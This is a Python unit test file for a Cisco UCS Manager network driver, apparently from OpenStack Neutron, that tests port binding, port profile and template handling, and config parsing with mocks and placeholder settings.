bc.constants.PORT_STATUS_ERROR,
bc.constants.PORT_STATUS_NOTAPPLICABLE]
for state in unsupported_states:
port['status'] = state
self.assertFalse(self.mech_driver._is_status_active(port))
def test_vmfex_vnic_type_and_vendor_info(self):
"""Verifies VM-FEX port is recognized as a supported vendor."""
port_context = self._create_port_context_vmfex()
vnic_type = port_context.current.get(bc.portbindings.VNIC_TYPE,
bc.portbindings.VNIC_NORMAL)
profile = port_context.current.get(bc.portbindings.PROFILE, {})
supported = self.ucsm_driver.check_vnic_type_and_vendor_info(
vnic_type, profile)
self.assertTrue(supported)
def test_unsupported_vnic_type_and_vendor_info(self):
"""Verifies unsupported pci vendor is rejected."""
port_context = self._create_port_context_bad()
vnic_type = port_context.current.get(bc.portbindings.VNIC_TYPE,
bc.portbindings.VNIC_NORMAL)
profile = port_context.current.get(bc.portbindings.PROFILE, {})
supported = self.ucsm_driver.check_vnic_type_and_vendor_info(
vnic_type, profile)
self.assertFalse(supported)
def test_sriov_vnic_type_and_vendor_info(self):
"""Verifies SR-IOV port and MACVTAP vnic_type are supported."""
port_context = self._create_port_context_sriov()
vnic_type = port_context.current.get(bc.portbindings.VNIC_TYPE,
bc.portbindings.VNIC_NORMAL)
profile = port_context.current.get(bc.portbindings.PROFILE, {})
supported = self.ucsm_driver.check_vnic_type_and_vendor_info(
vnic_type, profile)
self.assertTrue(supported)
def test_normal_vnic_type(self):
"""Verifies NORMAL vnic type is not supported."""
port_context = self._create_port_context_normal()
vnic_type = port_context.current.get(bc.portbindings.VNIC_TYPE,
bc.portbindings.VNIC_NORMAL)
profile = port_context.current.get(bc.portbindings.PROFILE, {})
supported = self.ucsm_driver.check_vnic_type_and_vendor_info(
vnic_type, profile)
self.assertFalse(supported)
def test_validate_vm_fex_port_cisco(self):
"""Verifies port's pci vendor info makes it VM-FEX capable."""
port_context = self._create_port_context_vmfex()
profile = port_context.current.get(bc.portbindings.PROFILE, {})
valid = self.ucsm_driver.is_vmfex_port(profile)
self.assertTrue(valid)
def test_validate_vm_fex_port_bad(self):
"""Verifies unsupported pci vendor is not VM-FEX capable."""
port_context = self._create_port_context_bad()
profile = port_context.current.get(bc.portbindings.PROFILE, {})
valid = self.ucsm_driver.is_vmfex_port(profile)
self.assertFalse(valid)
def test_validate_vm_fex_port_sriov(self):
"""Verifies valid SR-IOV port is not VM-FEX capable."""
port_context = self._create_port_context_sriov()
profile = port_context.current.get(bc.portbindings.PROFILE, {})
valid = self.ucsm_driver.is_vmfex_port(profile)
# For ex: Intel PCI is supported but is not vm-fex.
# so, should return False
self.assertFalse(valid)
def test_check_segment_vlan(self):
"""Verifies VLAN network segments are supported."""
self.assertTrue(self.mech_driver.check_segment(VLAN_SEGMENT))
def test_check_segment_vxlan(self):
"""Verifies VXLAN network segments are not supported."""
self.assertFalse(self.mech_driver.check_segment(VXLAN_SEGMENT))
def test_vmfex_update_port_precommit(self):
"""Verifies MD saves relevant info for VM-FEX ports into DB."""
name = PORT_NAME2
port_id = PORT_ID
vnic_type = VNIC_DIRECT
profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
profile_name = "OS-PP-100"
network_context = self._create_network_context()
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
# Port Profile name and Vlan id are written to DB.
self.mech_driver.update_port_precommit(port_context)
# Look for presence of above entry in the DB.
p_profile = self.db.get_port_profile_for_vlan(VLAN_ID_1,
UCSM_IP_ADDRESS_1)
self.assertEqual(profile_name, p_profile)
# Look to see if flag is set for update_port_postcommit to
# create Port Profile on UCS Manager.
self.assertFalse(self.db.is_port_profile_created(VLAN_ID_1,
UCSM_IP_ADDRESS_1))
def test_sriov_update_port_precommit(self):
"""Verifies MD does not create Port Profiles for SR-IOV ports."""
port_context = self._create_port_context_sriov()
self.mech_driver.update_port_precommit(port_context)
p_profile = self.db.get_port_profile_for_vlan(VLAN_ID_1,
UCSM_IP_ADDRESS_1)
self.assertIsNone(p_profile)
def test_get_physnet(self):
expected_physnet = 'test_physnet'
port_context = self._create_port_context_normal()
physnet = self.mech_driver._get_physnet(port_context)
self.assertEqual(expected_physnet, physnet)
def test_virtio_update_port_precommit(self):
"""Verifies MD adds VNIC Template to DB for Neutron virtio ports."""
TEST_VNIC_TEMPLATE = 'Test-VNIC'
TEST_PHYSNET = 'test_physnet'
port_context = self._create_port_context_normal()
def new_vnic_template_test(object):
return True
mock.patch.object(conf.UcsmConfig,
'is_vnic_template_configured',
new=new_vnic_template_test).start()
def new_get_vnic_template_for_physnet(object, ucsm_ip, physnet):
return ('org-root', 'Test-VNIC')
mock.patch.object(conf.UcsmConfig,
'get_vnic_template_for_physnet',
new=new_get_vnic_template_for_physnet).start()
vnic_template_path, vnic_template = (
self.ucsm_config.get_vnic_template_for_physnet(
UCSM_IP_ADDRESS_1, TEST_PHYSNET))
self.assertEqual(TEST_VNIC_TEMPLATE, vnic_template)
self.mech_driver.update_port_precommit(port_context)
db_entry = self.db.get_vnic_template_vlan_entry(VLAN_ID_1,
TEST_VNIC_TEMPLATE,
UCSM_IP_ADDRESS_1,
TEST_PHYSNET)
self.assertIsNotNone(db_entry)
self.assertEqual(VLAN_ID_1, db_entry.vlan_id)
@mock.patch.object(ucsm_db.UcsmDbModel, 'delete_sp_template_for_vlan')
@mock.patch.object(ucsm_db.UcsmDbModel, 'delete_vnic_template_for_vlan')
@mock.patch.object(ucsm_db.UcsmDbModel, 'delete_vlan_entry')
def test_delete_network_precommit_no_segments(
self, mock_delete_vlan_entry, mock_delete_vnic,
mock_delete_sp_template):
self.mech_driver.delete_network_precommit(FakeNetworkContext([]))
self.assertFalse(mock_delete_vlan_entry.called)
self.assertFalse(mock_delete_vnic.called)
self.assertFalse(mock_delete_sp_template.called)
@mock.patch.object(ucsm_db.UcsmDbModel, 'delete_sp_template_for_vlan')
@mock.patch.object(ucsm_db.UcsmDbModel, 'delete_vnic_template_for_vlan')
@mock.patch.object(ucsm_db.UcsmDbModel, 'delete_vlan_entry')
def test_delete_network_precommit_vlan_segment(
self, mock_delete_vlan_entry, mock_delete_vnic,
mock_delete_sp_template):
network_context = self._create_network_context()
vlan_id = network_context.network_segments[0]['segmentation_id']
self.mech_driver.delete_network_precommit(network_context)
mock_delete_vlan_entry.assert_called_once_with(vlan_id)
mock_delete_vnic.assert_called_once_with(vlan_id)
self.assertFalse(mock_delete_sp_template.called)
def test_update_port_postcommit_success(self):
"""Verifies duplicate Port Profiles are not being created."""
name = PORT_NAME
port_id = PORT_ID
vnic_type = VNIC_DIRECT
profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
network_context = self._create_network_context()
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
self.mech_driver.bind_port(port_context)
# Port Profile is added to DB and created on UCS Manager.
self.mech_driver.update_port_precommit(port_context)
self.assertFalse(self.db.is_port_profile_created(VLAN_ID_1,
UCSM_IP_ADDRESS_1))
# Call to UCS Manager driver top level method to create Port Profile
# is mocked to a new method here. This method verifies input params
# are correct.
def new_create_portprofile(mech_context, profile_name, vlan_id,
vnic_type, ucsm_ip, trunk_vlans):
return True
mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
'create_portprofile',
new=new_create_portprofile).start()
self.mech_driver.update_port_postcommit(port_context)
self.assertTrue(self.db.is_port_profile_created(VLAN_ID_1,
UCSM_IP_ADDRESS_1))
def test_update_port_postcommit_failure(self):
"""Verifies duplicate Port Profiles are not being created."""
name = PORT_NAME
port_id = PORT_ID
vnic_type = VNIC_DIRECT
profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
network_context = self._create_network_context()
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
self.mech_driver.bind_port(port_context)
# Port Profile is added to DB and created on UCS Manager.
self.mech_driver.update_port_precommit(port_context)
self.assertFalse(self.db.is_port_profile_created(VLAN_ID_1,
UCSM_IP_ADDRESS_1))
# Call to UCS Manager driver top level method to create Port Profile
# is mocked to a new method here. This method verifies input params
# are correct.
def new_create_portprofile(mech_context, profile_name, vlan_id,
vnic_type, ucsm_ip, trunk_vlans):
return False
mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
'create_portprofile',
new=new_create_portprofile).start()
self.mech_driver.update_port_postcommit(port_context)
self.assertFalse(self.db.is_port_profile_created(VLAN_ID_1,
UCSM_IP_ADDRESS_1))
def test_update_port_postcommit_direct(self):
"""Verifies UCS Manager driver is called with correct parameters."""
name = PORT_NAME
port_id = PORT_ID
vnic_direct = VNIC_DIRECT
profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
network_context = self._create_network_context()
port_context = FakePortContext(name, port_id, vnic_direct,
profile, network_context)
self.mech_driver.bind_port(port_context)
self.mech_driver.update_port_precommit(port_context)
# Call to UCS Manager driver top level method to create Port Profile
# is mocked to a new method here. This method verifies input params
# are correct.
def new_create_portprofile(mech_context, profile_name, vlan_id,
vnic_type, ucsm_ip, trunk_vlans):
self.assertEqual("OS-PP-100", profile_name)
self.assertEqual(100, vlan_id)
self.assertEqual(VNIC_DIRECT, vnic_type)
mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
'create_portprofile',
new=new_create_portprofile).start()
self.mech_driver.update_port_postcommit(port_context)
def test_update_port_postcommit_macvtap(self):
"""Verifies UCS Manager driver is called with correct parameters."""
name = PORT_NAME
port_id = PORT_ID
vnic_macvtap = VNIC_MACVTAP
profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
network_context = self._create_network_context()
port_context = FakePortContext(name, port_id, vnic_macvtap,
profile, network_context)
self.mech_driver.bind_port(port_context)
self.mech_driver.update_port_precommit(port_context)
# Call to UCS Manager driver top level method to create Port Profile
# is mocked to a new method here. This method verifies input params
# are correct.
def new_create_portprofile(mech_context, profile_name, vlan_id,
vnic_type, ucsm_ip, trunk_vlans):
self.assertEqual("OS-PP-100", profile_name)
self.assertEqual(100, vlan_id)
self.assertEqual(VNIC_MACVTAP, vnic_type)
mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
'create_portprofile',
new=new_create_portprofile).start()
self.mech_driver.update_port_postcommit(port_context)
def test_update_port_postcommit_normal(self):
"""Verifies UCS Manager driver is called with correct parameters."""
name = PORT_NAME
port_id = PORT_ID
vnic_type = VNIC_NORMAL
profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
network_context = self._create_network_context()
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
self.mech_driver.bind_port(port_context)
self.mech_driver.update_port_precommit(port_context)
# Call to UCS Manager driver top level method to create Port Profile
# is mocked to a new method here. This method verifies input params
# are correct.
def new_update_serviceprofile(mech_context, host_id, vlan_id):
return True
mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
'update_serviceprofile',
new=new_update_serviceprofile).start()
self.mech_driver.update_port_postcommit(port_context)
def test_vnic_template_db_methods(self):
"""Verifies VNIC Template DB methods."""
TEST_VNIC_TEMPLATE_1 = 'Test-VNIC1'
TEST_VNIC_TEMPLATE_2 = 'Test-VNIC2'
TEST_PHYSNET_1 = 'test_physnet1'
TEST_PHYSNET_2 = 'test_physnet2'
self.db.add_vnic_template(VLAN_ID_1, UCSM_IP_ADDRESS_1,
TEST_VNIC_TEMPLATE_1, TEST_PHYSNET_1)
self.db.add_vnic_template(VLAN_ID_2, UCSM_IP_ADDRESS_2,
TEST_VNIC_TEMPLATE_2, TEST_PHYSNET_2)
db_entry1 = self.db.get_vnic_template_vlan_entry(VLAN_ID_1,
TEST_VNIC_TEMPLATE_1,
UCSM_IP_ADDRESS_1,
TEST_PHYSNET_1)
self.assertIsNotNone(db_entry1)
self.assertEqual(VLAN_ID_1, db_entry1.vlan_id)
self.assertFalse(db_entry1.updated_on_ucs)
self.db.set_vnic_template_updated(VLAN_ID_2, UCSM_IP_ADDRESS_2,
TEST_VNIC_TEMPLATE_2, TEST_PHYSNET_2)
db_entry2 = self.db.get_vnic_template_vlan_entry(VLAN_ID_2,
TEST_VNIC_TEMPLATE_2,
UCSM_IP_ADDRESS_2,
TEST_PHYSNET_2)
self.assertIsNotNone(db_entry2)
self.assertEqual(VLAN_ID_2, db_entry2.vlan_id)
self.assertTrue(db_entry2.updated_on_ucs)
self.db.delete_vnic_template_for_vlan(VLAN_ID_2)
db_entry3 = self.db.get_vnic_template_vlan_entry(VLAN_ID_2,
TEST_VNIC_TEMPLATE_2,
UCSM_IP_ADDRESS_2,
TEST_PHYSNET_2)
self.assertIsNone(db_entry3)
def test_update_port_postcommit_vnic_template(self):
"""Verifies UCSM driver works correcly with VNIC Templates."""
TEST_VNIC_TEMPLATE = 'Test-VNIC'
TEST_PHYSNET = 'test_physnet'
port_context = self._create_port_context_normal()
self.ucsm_driver.ucsm_host_dict = UCSM_HOST_DICT
self.mech_driver.bind_port(port_context)
def new_vnic_template_test(object):
return True
mock.patch.object(conf.UcsmConfig,
'is_vnic_template_configured',
new=new_vnic_template_test).start()
physnet = self.mech_driver._get_physnet(port_context)
self.assertEqual(TEST_PHYSNET, physnet)
def new_get_vnic_template_for_physnet(object, ucsm_ip, physnet):
return ('org-root', 'Test-VNIC')
mock.patch.object(conf.UcsmConfig,
'get_vnic_template_for_physnet',
new=new_get_vnic_template_for_physnet).start()
vnic_template_path, vnic_template = (
self.ucsm_config.get_vnic_template_for_physnet(
UCSM_IP_ADDRESS_1, TEST_PHYSNET))
self.assertIsNotNone(vnic_template)
self.assertEqual(TEST_VNIC_TEMPLATE, vnic_template)
self.mech_driver.update_port_precommit(port_context)
def new_update_vnic_template(mech_context, host_id, vlan_id, physnet,
vnic_template_path, vnic_template):
return True
mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
'update_vnic_template',
new=new_update_vnic_template).start()
ucsm_ip = self.ucsm_driver.get_ucsm_ip_for_host(HOST1)
self.assertEqual(UCSM_IP_ADDRESS_1, ucsm_ip)
self.mech_driver.update_port_postcommit(port_context)
db_entry = self.db.get_vnic_template_vlan_entry(VLAN_ID_1,
vnic_template,
UCSM_IP_ADDRESS_1,
TEST_PHYSNET)
self.assertIsNotNone(db_entry)
self.assertEqual(UCSM_IP_ADDRESS_1, db_entry.device_id)
def test_bind_port_active(self):
"""Verifies bind_port sets the port status as active."""
name = PORT_NAME
port_id = PORT_ID
vnic_type = VNIC_DIRECT
profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
network_context = FakeNetworkContext(VLAN_SEGMENTS_GOOD)
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
self.mech_driver.bind_port(port_context)
self.assertEqual(PORT_STATE_ACTIVE, port_context._port['status'])
def test_ucs_manager_disconnect_fail(self):
"""Verifies UCS Manager driver is called with correct parameters."""
handle = None
ucsm_ip = UCSM_IP_ADDRESS_2
self.assertRaises(exceptions.UcsmDisconnectFailed,
self.ucsm_driver.ucs_manager_disconnect,
handle, ucsm_ip)
def test_generic_create_profile(self):
"""Test to verify duplicate creation exceptions.
This is a generic test to mimic the behavior of any UCS Manager
driver function that creates a profile on the UCS Manager. The
first time the profile is created, the create succeeds if all
parameters are correct. If we attempt to create it any number
of times after that, UCS Manager throws an exception. This test
code mimics that behavior by using counter to keep track of how
many times 'update_serviceprofile' is being called.
counter == 0 -> Simulates invalid input, so raise an exception.
counter == 1 -> Simulates valid inputs and 1st creation request.
counter > 1 -> Simulates duplicate creation request and results
in UCS Manager throwing a duplicate creation request.
"""
def static_vars(**kwargs):
def decorate(func):
for k in kwargs:
setattr(func, k, kwargs[k])
return func
return decorate
@static_vars(counter=-1)
def new_create_ucsm_profile(mech_context, host_id, vlan_id):
new_create_ucsm_profile.counter += 1
try:
if new_create_ucsm_profile.counter == 0:
raise Exception("Invalid Operation")
elif new_create_ucsm_profile.counter > 1:
raise Exception(const.DUPLICATE_EXCEPTION)
else:
return True
except Exception as e:
if const.DUPLICATE_EXCEPTION in str(e):
return True
else:
raise exceptions.UcsmConfigFailed(config=vlan_id,
ucsm_ip=UCSM_IP_ADDRESS_1, exc=e)
mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
'update_serviceprofile',
new=new_create_ucsm_profile).start()
# Results in new_create_ucsm_profile being called with counter=-1
self.assertRaises(exceptions.UcsmConfigFailed,
self.ucsm_driver.update_serviceprofile,
HOST1, VLAN_ID_1)
# Results in new_create_ucsm_profile being called with counter=0
self.assertTrue(self.ucsm_driver.update_serviceprofile(
HOST1, VLAN_ID_1))
# Results in new_create_ucsm_profile being called with counter=1
self.assertTrue(self.ucsm_driver.update_serviceprofile(
HOST1, VLAN_ID_1))
def test_parse_ucsm_host_config(self):
"""Verifies parsing of Hostname:Service Profile config."""
ucsm_sp_dict = {}
ucsm_host_dict = {}
cfg.CONF.ml2_cisco_ucsm.ucsm_host_list = {'Host1': 'SP1',
'Host2': 'SP2'}
cfg.CONF.ml2_cisco_ucsm.ucsm_ip = '1.1.1.1'
expected_ip = '1.1.1.1'
expected_sp1 = "org-root/ls-SP1"
expected_sp2 = "org-root/ls-SP2"
ucsm_sp_dict = self.ucsm_config.ucsm_sp_dict
ucsm_host_dict = self.ucsm_config.ucsm_host_dict
key = (cfg.CONF.ml2_cisco_ucsm.ucsm_ip, 'Host1')
self.assertIn(key, ucsm_sp_dict)
self.assertEqual(expected_sp1, ucsm_sp_dict[key])
self.assertIn('Host1', ucsm_host_dict)
self.assertEqual(expected_ip, ucsm_host_dict['Host1'])
key = (cfg.CONF.ml2_cisco_ucsm.ucsm_ip, 'Host2')
self.assertIn(key, ucsm_sp_dict)
self.assertEqual(expected_sp2, ucsm_sp_dict.get(key))
self.assertEqual(expected_ip, ucsm_host_dict.get('Host2'))
key = (cfg.CONF.ml2_cisco_ucsm.ucsm_ip, 'Host3')
self.assertNotIn(key, ucsm_sp_dict)
self.assertIsNone(ucsm_host_dict.get('Host3'))
def test_parse_virtio_eth_ports(self):
"""Verifies eth_port_list contains a fully-formed path."""
cfg.CONF.ml2_cisco_ucsm.ucsm_ip = '1.1.1.1'
cfg.CONF.ml2_cisco_ucsm.ucsm_virtio_eth_ports = ['test-eth1',
'test-eth2']
eth_port_list = self.ucsm_config.get_ucsm_eth_port_list("1.1.1.1")
self.assertNotIn('test-eth1', eth_port_list)
self.assertIn(const.ETH_PREFIX + 'test-eth1', eth_port_list)
def test_ucsm_host_config_with_path(self):
"""Verifies that ucsm_host_list can contain SP paths."""
expected_service_profile1 = 'org-root/ls-SP1'
expected_service_profile2 = 'org-root/sub-org1/ls-SP2'
cfg.CONF.ml2_cisco_ucsm.ucsm_ip = '1.1.1.1'
cfg.CONF.ml2_cisco_ucsm.ucsm_host_list = {'Host1': 'SP1',
'Host2': 'org-root/sub-org1/ls-SP2'}
ucsm_sp_dict = self.ucsm_config.ucsm_sp_dict
key = ('1.1.1.1', 'Host1')
actual_service_profile1 = ucsm_sp_dict.get(key)
self.assertEqual(expected_service_profile1, actual_service_profile1)
key = ('1.1.1.1', 'Host2')
actual_service_profile2 = ucsm_sp_dict.get(key)
self.assertEqual(expected_service_profile2, actual_service_profile2)
def test_host_id_to_hostname(self):
"""Verifies extraction of hostname from host-id from Nova."""
host_id_with_domain1 = 'compute1.cisco.com'
expected_hostname1 = 'compute1'
hostname = self.mech_driver._get_host_id(
host_id_with_domain1)
self.assertEqual(expected_hostname1, hostname)
host_id_with_domain2 = 'compute2.localdomain'
expected_hostname2 = 'compute2'
hostname = self.mech_driver._get_host_id(
host_id_with_domain2)
self.assertEqual(expected_hostname2, hostname)
host_id3 = 'compute3'
hostname = self.mech_driver._get_host_id(host_id3)
self.assertEqual(host_id3, hostname)
def test_port_profile_delete_table_add(self):
"""Verifies that add and get of 1 PP to delete table works."""
self.db.add_port_profile_to_delete_table('OS-PP-100', '10.10.10.10')
self.assertTrue(self.db.has_port_profile_to_delete('OS-PP-100',
'10.10.10.10'))
def test_pp_delete_table_add_multiple(self):
"""Verifies that add and get of multiple PPs to delete table works."""
self.db.add_port_profile_to_delete_table("OS-PP-100", "10.10.10.10")
self.db.add_port_profile_to_delete_table("OS-PP-200", "10.10.10.10")
all_pps = self.db.get_all_port_profiles_to_delete()
for pp in all_pps:
self.assertEqual("10.10.10.10", pp.device_id)
def test_remove_port_profile_from_table(self):
"""Verifies that removing entry from PP delete table works."""
self.db.add_port_profile_to_delete_table("OS-PP-100", "10.10.10.10")
self.db.remove_port_profile_to_delete("OS-PP-100", "10.10.10.10")
self.assertFalse(self.db.has_port_profile_to_delete("OS-PP-100",
"10.10.10.10"))
def test_remove_non_existent_port_profile_from_table(self):
"""Verifies that removing previously deleted PP works."""
self.assertIsNone(self.db.remove_port_profile_to_delete(
"OS-PP-100", "10.10.10.10"))
def test_port_profile_delete_on_ucsm(self):
"""Verifies that the PP delete retry logic."""
handle = FakeUcsmHandle(PORT_PROFILE_1)
# 1st call to delete_port_profile is designed to not find
# the PP on the UCSM
self.ucsm_driver._delete_port_profile(
handle, PORT_PROFILE_1, UCSM_IP_ADDRESS_1)
# No entry added to the PP delete table
self.assertFalse(self.ucsm_driver.ucsm_db.has_port_profile_to_delete(
PORT_PROFILE_1, UCSM_IP_ADDRESS_1))
# 2nd call to delete_port_profile is designed to raise exception
self.ucsm_driver._delete_port_profile(
handle, PORT_PROFILE_1, UCSM_IP_ADDRESS_1)
# Failed delete results in entry being created in the PP delete table
self.assertTrue(self.ucsm_driver.ucsm_db.has_port_profile_to_delete(
PORT_PROFILE_1, UCSM_IP_ADDRESS_1))
def test_add_sp_template_config_to_db(self):
"""Verifies the SP template dict has been created properly."""
host_id = HOST1
ucsm_ip = UCSM_IP_ADDRESS_1
sp_template_with_path = "/org-root/test/ls-SP-Test"
sp_template_info = sp_template_with_path.rsplit('/', 1)
self.ucsm_config.update_sp_template_config(host_id, ucsm_ip,
sp_template_with_path)
self.assertIsNotNone(
self.ucsm_config.get_sp_template_for_host(host_id))
self.assertEqual(sp_template_info[1],
self.ucsm_config.get_sp_template_for_host(host_id))
self.assertEqual(sp_template_info[0],
self.ucsm_config.get_sp_template_path_for_host(host_id))
def test_get_ucsm_ip_for_host_success(self):
"""Verfies that ucsm_ip to Service Profile mapping is successful."""
host_id = HOST1
ucsm_ip = UCSM_IP_ADDRESS_1
sp_template_with_path = "/org-root/test/ls-SP-Test"
self.ucsm_config.update_sp_template_config(host_id, ucsm_ip,
sp_template_with_path)
self.assertEqual(ucsm_ip, self.ucsm_driver.get_ucsm_ip_for_host(
host_id))
def test_get_ucsm_ip_for_host_failure(self):
"""Tests that case where UCSM does not control this host."""
def new_learn_sp_and_template_for_host(mech_instance, host_id):
return None
mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
'_learn_sp_and_template_for_host',
new=new_learn_sp_and_template_for_host).start()
self.assertIsNone(self.ucsm_driver.get_ucsm_ip_for_host('Hostname3'))
def test_learn_sp_and_template_for_host_exp(self):
"""Tests case where reading config from UCSM generates exception."""
host_id = HOST1
def mocked_connect(self, ucsm_ip):
handle = mock.Mock()
return handle
mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
'ucs_manager_connect',
new=mocked_connect).start()
self.assertRaises(exceptions.UcsmConfigReadFailed,
self.ucsm_driver._learn_sp_and_template_for_host,
host_id)
def test_learn_sp_and_template_for_host_error(self):
"""Tests case where learning config from UCSM gives diff host.`"""
host_id = HOST1
def mocked_connect(self, ucsm_ip):
handle = FakeUcsmHandle(PORT_PROFILE_1, FakeServer(HOST2))
return handle
mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
'ucs_manager_connect',
new=mocked_connect).start()
self.assertIsNone(
self.ucsm_driver._learn_sp_and_template_for_host(host_id))
def test_learn_sp_and_template_for_host_success(self):
"""Tests case where learning config from UCSM gives correct host.`"""
host_id = HOST1
expected_ucsm_ip = '2.2.2.2'
def mocked_connect(self, ucsm_ip):
if ucsm_ip == expected_ucsm_ip:
handle = FakeUcsmHandle()
else:
handle = FakeUcsmHandle(invalid_classid=True)
return handle
mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
'ucs_manager_connect',
new=mocked_connect).start()
actual_ucsm_ip = self.ucsm_driver._learn_sp_and_template_for_host(
host_id)
self.assertEqual(expected_ucsm_ip, actual_ucsm_ip)
# Resetting the ucsm_host_dict value to what the other tests expect.
self.ucsm_driver.ucsm_host_dict[HOST1] = '1.1.1.1'
def test_parsing_of_single_ucsm_config(self):
"""Verifies parsing of expected single UCSM config parameters."""
# Single UCSM config parameters.
cfg.CONF.ml2_cisco_ucsm.ucsm_ip = "1.1.1.1"
cfg.CONF.ml2_cisco_ucsm.ucsm_username = "user1"
cfg.CONF.ml2_cisco_ucsm.ucsm_password = "password1"
cfg.CONF.ml2_cisco_ucsm.ucsm_virtio_eth_ports = ["eth0", "eth1"]
expected_parsed_virtio_eth_ports = ["/ether-eth0", "/ether-eth1"]
ucsm_config = conf.UcsmConfig()
username, password = ucsm_config.get_credentials_for_ucsm_ip(
cfg.CONF.ml2_cisco_ucsm.ucsm_ip)
self.assertEqual(username, cfg.CONF.ml2_cisco_ucsm.ucsm_username)
self.assertEqual(password, cfg.CONF.ml2_cisco_ucsm.ucsm_password)
virtio_port_list = ucsm_config.get_ucsm_eth_port_list(
cfg.CONF.ml2_cisco_ucsm.ucsm_ip)
self.assertEqual(expected_parsed_virtio_eth_ports,
virtio_port_list)
# Check to see that SSL certificate checking is set to True by default
self.assertTrue(cfg.CONF.ml2_cisco_ucsm.ucsm_https_verify)
def test_parsing_of_single_ucsm_vnic_template_config(self):
"""Verifies parsing of single UCSM vNIC Template config."""
# Single UCSM config parameters.
cfg.CONF.ml2_cisco_ucsm.ucsm_ip = "1.1.1.1"
cfg.CONF.ml2_cisco_ucsm.ucsm_username = "user1"
cfg.CONF.ml2_cisco_ucsm.ucsm_password = "password1"
cfg.CONF.ml2_cisco_ucsm.ucsm_virtio_eth_ports = ["eth0", "eth1"]
cfg.CONF.ml2_cisco_ucsm.vnic_template_list = (
'physnet1:top-root:Test-VNIC1 '
'physnet2:org-root/org-Test-Sub:Test-VNIC2 '
'physnet3::Test-VNIC3')
# Expected values after parsing of config parametrs
expected_vnic_template1 = ('org-root/org-Test-Sub', 'Test-VNIC2')
expected_vnic_template2 = [
('top-root', 'Test-VNIC1'),
('org-root/org-Test-Sub', 'Test-VNIC2'),
('org-root', 'Test-VNIC3')
]
ucsm_config = conf.UcsmConfig()
ucsm_config.vnic_template_dict = {}
# Verify parsing of VNIC Template config
self.assertTrue(ucsm_config.is_vnic_template_configured())
vnic_template1 = ucsm_config.get_vnic_template_for_physnet(
cfg.CONF.ml2_cisco_ucsm.ucsm_ip, "physnet2")
self.assertEqual(expected_vnic_template1, vnic_template1)
vnic_template2 = ucsm_config.get_vnic_template_for_ucsm_ip(
cfg.CONF.ml2_cisco_ucsm.ucsm_ip)
self.assertEqual(expected_vnic_template2, vnic_template2)
vnic_template_path, vnic_template = (
ucsm_config.get_vnic_template_for_physnet("1.1.1.1",
"physnet1"))
vnic_templ_full_path1 = (vnic_template_path +
const.VNIC_TEMPLATE_PREFIX + str(vnic_template))
expected_vnic_templ_full_path1 = "top-root/lan-conn-templ-Test-VNIC1"
self.assertEqual(expected_vnic_templ_full_path1,
vnic_templ_full_path1)
vnic_template_path, vnic_template = (
ucsm_config.get_vnic_template_for_physnet("1.1.1.1",
"physnet2"))
vnic_templ_full_path1 = (vnic_template_path +
const.VNIC_TEMPLATE_PREFIX + str(vnic_template))
expected_vnic_templ_full_path1 = (
"org-root/org-Test-Sub/lan-conn-templ-Test-VNIC2")
self.assertEqual(expected_vnic_templ_full_path1,
vnic_templ_full_path1)
vnic_template_path, vnic_template = (
ucsm_config.get_vnic_template_for_physnet("1.1.1.1",
"physnet3"))
vnic_templ_full_path1 = (vnic_template_path +
const.VNIC_TEMPLATE_PREFIX + str(vnic_template))
expected_vnic_templ_full_path1 = "org-root/lan-conn-templ-Test-VNIC3"
self.assertEqual(expected_vnic_templ_full_path1,
vnic_templ_full_path1)
def test_parsing_of_single_ucsm_sp_template_config(self):
"""Verifies parsing of single UCSM SP Template config."""
# Single UCSM config parameters.
cfg.CONF.ml2_cisco_ucsm.ucsm_ip = "1.1.1.1"
cfg.CONF.ml2_cisco_ucsm.ucsm_username = "user1"
cfg.CONF.ml2_cisco_ucsm.ucsm_password = "password1"
cfg.CONF.ml2_cisco_ucsm.ucsm_virtio_eth_ports = ["eth0", "eth1"]
cfg.CONF.ml2_cisco_ucsm.sp_template_list = (
'SP_Template1_path:SP_Template1:Host11,Host12 '
'SP_Template2_path:SP_Template2:Host21,Host22')
ucsm_config = conf.UcsmConfig()
# Verify parsing of SP Template config
self.assertTrue(ucsm_config.is_service_profile_template_configured())
# Test all the utility methods to glean information
# from sp_template_dict
expected_sp_template_path = "SP_Template1_path"
sp_template_path = ucsm_config.get_sp_template_path_for_host("Host11")
self.assertEqual(expected_sp_template_path, sp_template_path)
expected_sp_template = "SP_Template1"
sp_template = ucsm_config.get_sp_template_for_host("Host12")
self.assertEqual(expected_sp_template, sp_template)
expected_ucsm_ip = "1.1.1.1"
ucsm_ip = ucsm_config.get_ucsm_ip_for_sp_template_host("Host21")
self.assertEqual(expected_ucsm_ip, ucsm_ip)
expected_sp_template_list = [
('1.1.1.1', 'SP_Template2_path', 'SP_Template2'),
('1.1.1.1', 'SP_Template1_path', 'SP_Template1'),
]
sp_template_list = ucsm_config.get_sp_template_list_for_ucsm("1.1.1.1")
for entry in expected_sp_template_list:
self.assertIn(entry, sp_template_list)
expected_sp_template_list = []
sp_template_list = ucsm_config.get_sp_template_list_for_ucsm("2.2.2.2")
self.assertEqual(expected_sp_template_list, sp_template_list)
| 41.944862
| 79
| 0.650056
|
4a07da572cce21f339ac55c7a21fc0797da17e24
| 5,162
|
py
|
Python
|
multifasta2clades.py
|
